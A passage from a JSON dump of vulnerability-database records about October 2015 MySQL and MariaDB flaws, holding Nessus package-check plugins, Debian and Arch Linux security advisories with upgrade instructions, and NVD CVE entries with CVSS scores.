attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4830/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4836/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4858/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4861/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4870/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4879/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4895/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4913/\"\n );\n # https://www.suse.com/support/update/announcement/2016/suse-su-20160121-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?9391e6e6\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Workstation Extension 12 :\n\nzypper in -t patch SUSE-SLE-WE-12-2016-87=1\n\nSUSE Linux Enterprise Software Development Kit 12 :\n\nzypper in -t patch SUSE-SLE-SDK-12-2016-87=1\n\nSUSE Linux Enterprise Server 12 :\n\nzypper in -t patch SUSE-SLE-SERVER-12-2016-87=1\n\nSUSE Linux Enterprise Desktop 12 :\n\nzypper in -t patch SUSE-SLE-DESKTOP-12-2016-87=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libmysqlclient18\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libmysqlclient18-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libmysqlclient_r18\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:mariadb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:mariadb-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:mariadb-client-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:mariadb-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:mariadb-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:mariadb-errormessages\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:mariadb-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:mariadb-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/10/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/01/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/01/18\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED12|SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12 / SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP0\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED12\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libmysqlclient18-10.0.22-20.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libmysqlclient18-debuginfo-10.0.22-20.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"mariadb-10.0.22-20.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"mariadb-client-10.0.22-20.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"mariadb-client-debuginfo-10.0.22-20.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"mariadb-debuginfo-10.0.22-20.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"mariadb-debugsource-10.0.22-20.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"mariadb-errormessages-10.0.22-20.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"mariadb-tools-10.0.22-20.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"mariadb-tools-debuginfo-10.0.22-20.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libmysqlclient18-32bit-10.0.22-20.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"libmysqlclient18-debuginfo-32bit-10.0.22-20.3.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libmysqlclient18-10.0.22-20.3.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libmysqlclient18-32bit-10.0.22-20.3.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libmysqlclient18-debuginfo-10.0.22-20.3.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libmysqlclient18-debuginfo-32bit-10.0.22-20.3.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libmysqlclient_r18-10.0.22-20.3.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"libmysqlclient_r18-32bit-10.0.22-20.3.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"mariadb-10.0.22-20.3.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"mariadb-client-10.0.22-20.3.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"mariadb-client-debuginfo-10.0.22-20.3.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"mariadb-debuginfo-10.0.22-20.3.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"mariadb-debugsource-10.0.22-20.3.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"mariadb-errormessages-10.0.22-20.3.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"mariadb\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T09:49:16", "description": "Several issues have been discovered in the MySQL database server. The\nvulnerabilities are addressed by upgrading MySQL to the new upstream\nversion 5.5.46. Please see the MySQL 5.5 Release Notes and Oracle's\nCritical Patch Update advisory for further details :\n\n -\n https://dev.mysql.com/doc/relnotes/mysql/5.5/en/news-5-5\n -45.html\n -\n https://dev.mysql.com/doc/relnotes/mysql/5.5/en/news-5-5\n -46.html\n\n -\n http://www.oracle.com/technetwork/topics/security/cpuoct\n 2015-2367953.html", "edition": 23, "published": "2015-10-26T00:00:00", "title": "Debian DSA-3377-1 : mysql-5.5 - security update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-4830", "CVE-2015-4816", "CVE-2015-4913", "CVE-2015-4858", "CVE-2015-4802", "CVE-2015-4815", "CVE-2015-4879", "CVE-2015-4792", "CVE-2015-4819", "CVE-2015-4836", "CVE-2015-4861", "CVE-2015-4870", "CVE-2015-4826"], "modified": "2015-10-26T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:8.0", "p-cpe:/a:debian:debian_linux:mysql-5.5", "cpe:/o:debian:debian_linux:7.0"], "id": "DEBIAN_DSA-3377.NASL", "href": "https://www.tenable.com/plugins/nessus/86580", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-3377. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(86580);\n script_version(\"2.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2015-4792\", \"CVE-2015-4802\", \"CVE-2015-4815\", \"CVE-2015-4816\", \"CVE-2015-4819\", \"CVE-2015-4826\", \"CVE-2015-4830\", \"CVE-2015-4836\", \"CVE-2015-4858\", \"CVE-2015-4861\", \"CVE-2015-4870\", \"CVE-2015-4879\", \"CVE-2015-4913\");\n script_xref(name:\"DSA\", value:\"3377\");\n\n script_name(english:\"Debian DSA-3377-1 : mysql-5.5 - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several issues have been discovered in the MySQL database server. The\nvulnerabilities are addressed by upgrading MySQL to the new upstream\nversion 5.5.46. Please see the MySQL 5.5 Release Notes and Oracle's\nCritical Patch Update advisory for further details :\n\n -\n https://dev.mysql.com/doc/relnotes/mysql/5.5/en/news-5-5\n -45.html\n -\n https://dev.mysql.com/doc/relnotes/mysql/5.5/en/news-5-5\n -46.html\n\n -\n http://www.oracle.com/technetwork/topics/security/cpuoct\n 2015-2367953.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=802564\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://dev.mysql.com/doc/relnotes/mysql/5.5/en/news-5-5-45.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://dev.mysql.com/doc/relnotes/mysql/5.5/en/news-5-5-46.html\"\n );\n # https://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?404a1fb9\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/mysql-5.5\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/mysql-5.5\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2015/dsa-3377\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the mysql-5.5 packages.\n\nFor the oldstable distribution (wheezy), these problems have been\nfixed in version 5.5.46-0+deb7u1.\n\nFor the stable distribution (jessie), these problems have been fixed\nin version 5.5.46-0+deb8u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:mysql-5.5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/10/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/10/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"libmysqlclient-dev\", reference:\"5.5.46-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libmysqlclient18\", reference:\"5.5.46-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libmysqld-dev\", reference:\"5.5.46-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libmysqld-pic\", reference:\"5.5.46-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"mysql-client\", reference:\"5.5.46-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"mysql-client-5.5\", reference:\"5.5.46-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"mysql-common\", reference:\"5.5.46-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"mysql-server\", reference:\"5.5.46-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"mysql-server-5.5\", reference:\"5.5.46-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"mysql-server-core-5.5\", reference:\"5.5.46-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"mysql-source-5.5\", reference:\"5.5.46-0+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"mysql-testsuite-5.5\", reference:\"5.5.46-0+deb7u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libmysqlclient-dev\", reference:\"5.5.46-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libmysqlclient18\", reference:\"5.5.46-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libmysqld-dev\", reference:\"5.5.46-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libmysqld-pic\", reference:\"5.5.46-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"mysql-client\", reference:\"5.5.46-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"mysql-client-5.5\", reference:\"5.5.46-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"mysql-common\", reference:\"5.5.46-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"mysql-server\", reference:\"5.5.46-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"mysql-server-5.5\", reference:\"5.5.46-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"mysql-server-core-5.5\", reference:\"5.5.46-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"mysql-source-5.5\", reference:\"5.5.46-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"mysql-testsuite\", reference:\"5.5.46-0+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"mysql-testsuite-5.5\", reference:\"5.5.46-0+deb8u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "archlinux": [{"lastseen": "2016-09-02T18:44:37", "bulletinFamily": "unix", "cvelist": ["CVE-2015-4830", "CVE-2015-4913", "CVE-2015-4858", "CVE-2015-4802", "CVE-2015-4815", "CVE-2015-4792", "CVE-2015-4836", "CVE-2015-4861", "CVE-2015-4870", "CVE-2015-4826"], "description": "- CVE-2015-4913 (denial of service)\nallows remote authenticated users to affect availability via\nvectors related to Server : DML, a different vulnerability than CVE-2015-4858.\n\n- CVE-2015-4870 (denial of service)\nallows remote authenticated users to affect availability via unknown vectors\nrelated to Server : Parser.\n\n- CVE-2015-4861 (denial of service)\nallows remote authenticated users to affect availability via unknown vectors\nrelated to Server : InnoDB.\n\n- CVE-2015-4858 (denial of service)\nallows remote authenticated users to affect availability via\nvectors related to DML, a different vulnerability than CVE-2015-4913.\n\n- CVE-2015-4836 (denial of service)\nallows remote authenticated users to affect availability via unknown vectors\nrelated to Server : SP.\n\n- CVE-2015-4830 (denial of service)\nallows remote authenticated users to affect integrity via unknown vectors\nrelated to Server : Security : Privileges.\n\n- CVE-2015-4826 (denial of service)\nallows remote authenticated users to affect confidentiality via unknown vectors\nrelated to Server : Types.\n\n- CVE-2015-4815 (denial of service)\nallows remote authenticated users to affect availability via vectors related to\nServer : DDL.\n\n- CVE-2015-4802 (denial of service)\nallows remote authenticated users to affect availability via unknown vectors\nrelated to Server : Partition, a different vulnerability than CVE-2015-4792.\n\n- CVE-2015-4792 (denial of service)\nallows remote authenticated users to affect availability via unknown vectors\nrelated to Server : Partition, a different vulnerability than CVE-2015-4802.", "modified": "2015-10-30T00:00:00", "published": "2015-10-30T00:00:00", "id": "ASA-201510-26", "href": "https://lists.archlinux.org/pipermail/arch-security/2015-October/000428.html", "type": "archlinux", "title": "mariadb: denial of service", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:NONE/I:PARTIAL/A:NONE/"}}], "debian": [{"lastseen": "2020-08-12T00:51:29", "bulletinFamily": "unix", "cvelist": ["CVE-2015-4830", "CVE-2015-4816", "CVE-2015-4913", "CVE-2015-4858", "CVE-2015-4802", "CVE-2015-4815", "CVE-2015-4879", "CVE-2015-4792", "CVE-2015-4819", "CVE-2015-4836", "CVE-2015-4861", "CVE-2015-4870", "CVE-2015-4826"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3377-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nOctober 24, 2015 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : mysql-5.5\nCVE ID : CVE-2015-4792 CVE-2015-4802 CVE-2015-4815 CVE-2015-4816\n CVE-2015-4819 CVE-2015-4826 CVE-2015-4830 CVE-2015-4836\n CVE-2015-4858 CVE-2015-4861 CVE-2015-4870 CVE-2015-4879\n CVE-2015-4913\nDebian Bug : 802564\n\nSeveral issues have been discovered in the MySQL database server. The\nvulnerabilities are addressed by upgrading MySQL to the new upstream\nversion 5.5.46. Please see the MySQL 5.5 Release Notes and Oracle's\nCritical Patch Update advisory for further details:\n\n https://dev.mysql.com/doc/relnotes/mysql/5.5/en/news-5-5-45.html\nhttps://dev.mysql.com/doc/relnotes/mysql/5.5/en/news-5-5-46.html\nhttp://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\n\nFor the oldstable distribution (wheezy), these problems have been fixed\nin version 5.5.46-0+deb7u1.\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 5.5.46-0+deb8u1.\n\nWe recommend that you upgrade your mysql-5.5 packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 9, "modified": "2015-10-24T08:07:10", "published": "2015-10-24T08:07:10", "id": "DEBIAN:DSA-3377-1:D5B01", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2015/msg00276.html", "title": "[SECURITY] [DSA 3377-1] mysql-5.5 security update", "type": "debian", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-08-12T00:51:14", "bulletinFamily": "unix", "cvelist": ["CVE-2015-4895", "CVE-2015-4830", "CVE-2015-4816", "CVE-2015-4913", "CVE-2015-4858", "CVE-2015-4802", "CVE-2015-4815", "CVE-2015-4879", "CVE-2015-4792", "CVE-2015-4819", "CVE-2015-4836", "CVE-2015-4861", "CVE-2015-4870", "CVE-2015-4826"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3385-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nOctober 31, 2015 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : mariadb-10.0\nCVE ID : CVE-2015-4792 CVE-2015-4802 CVE-2015-4815 CVE-2015-4816\n CVE-2015-4819 CVE-2015-4826 CVE-2015-4830 CVE-2015-4836\n CVE-2015-4858 CVE-2015-4861 CVE-2015-4870 CVE-2015-4879\n CVE-2015-4895 CVE-2015-4913\nDebian Bug : 802874\n\nSeveral issues have been discovered in the MariaDB database server. The\nvulnerabilities are addressed by upgrading MariaDB to the new upstream\nversion 10.0.22. Please see the MariaDB 10.0 Release Notes for further\ndetails:\n\n https://mariadb.com/kb/en/mariadb/mariadb-10021-release-notes/\nhttps://mariadb.com/kb/en/mariadb/mariadb-10022-release-notes/\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 10.0.22-0+deb8u1.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 10.0.22-1 or earlier.\n\nWe recommend that you upgrade your mariadb-10.0 packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 8, "modified": "2015-10-31T08:23:55", "published": "2015-10-31T08:23:55", "id": "DEBIAN:DSA-3385-1:73003", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2015/msg00285.html", "title": "[SECURITY] [DSA 3385-1] mariadb-10.0 security update", "type": "debian", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2020-12-09T20:03:04", "description": "Unspecified vulnerability in Oracle MySQL Server 5.5.45 and earlier, and 5.6.26 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server : InnoDB.", "edition": 6, "cvss3": {}, "published": "2015-10-21T23:59:00", "title": "CVE-2015-4861", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 3.5, "vectorString": "AV:N/AC:M/Au:S/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-4861"], "modified": "2019-12-27T16:08:00", "cpe": ["cpe:/o:novell:suse_linux_enterprise_server:12.0", "cpe:/o:novell:suse_linux_enterprise_desktop:12.0", "cpe:/a:oracle:mysql:5.6.26", "cpe:/o:redhat:enterprise_linux_server:7.0", "cpe:/o:redhat:enterprise_linux:7.0", "cpe:/o:novell:suse_linux_enterprise_workstation_extension:12.0", "cpe:/o:opensuse:leap:42.1", "cpe:/o:redhat:enterprise_linux_workstation:7.0", "cpe:/a:oracle:mysql:5.5.45", "cpe:/o:novell:suse_linux_enterprise_software_development_kit:12.0", "cpe:/o:redhat:enterprise_linux_hpc_node:7.0", "cpe:/o:redhat:enterprise_linux_server_aus:7.2", "cpe:/o:oracle:linux:7", "cpe:/o:redhat:enterprise_linux_desktop:7.0", "cpe:/o:redhat:enterprise_linux_server_eus:7.2", "cpe:/o:redhat:enterprise_linux_hpc_node_eus:7.2", "cpe:/o:redhat:enterprise_linux:6.0", "cpe:/o:oracle:solaris:11.3"], "id": "CVE-2015-4861", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4861", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:o:redhat:enterprise_linux_hpc_node_eus:7.2:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.2:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_workstation_extension:12.0:sp1:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.5.45:*:*:*:*:*:*:*", "cpe:2.3:o:oracle:solaris:11.3:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_software_development_kit:12.0:sp1:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_desktop:12.0:sp1:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.2:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:oracle:linux:7:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql:5.6.26:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_hpc_node:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:leap:42.1:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_server:12.0:sp1:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:03:04", "description": "Unspecified vulnerability in Oracle MySQL Server 5.5.45 and earlier, and 5.6.26 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server : SP.", "edition": 6, "cvss3": {}, "published": "2015-10-21T23:59:00", "title": "CVE-2015-4836", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 5.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 2.8, "vectorString": "AV:N/AC:M/Au:M/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "MULTIPLE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-4836"], "modified": "2019-12-27T16:08:00", "cpe": ["cpe:/o:novell:suse_linux_enterprise_server:12.0", "cpe:/o:novell:suse_linux_enterprise_desktop:12.0", "cpe:/a:oracle:mysql:5.6.26", "cpe:/o:redhat:enterprise_linux_server:7.0", "cpe:/o:redhat:enterprise_linux:7.0", "cpe:/o:novell:suse_linux_enterprise_workstation_extension:12.0", "cpe:/o:opensuse:leap:42.1", "cpe:/o:redhat:enterprise_linux_workstation:7.0", "cpe:/a:oracle:mysql:5.5.45", "cpe:/o:novell:suse_linux_enterprise_software_development_kit:12.0", "cpe:/o:redhat:enterprise_linux_hpc_node:7.0", "cpe:/o:redhat:enterprise_linux_server_aus:7.2", "cpe:/o:oracle:linux:7", 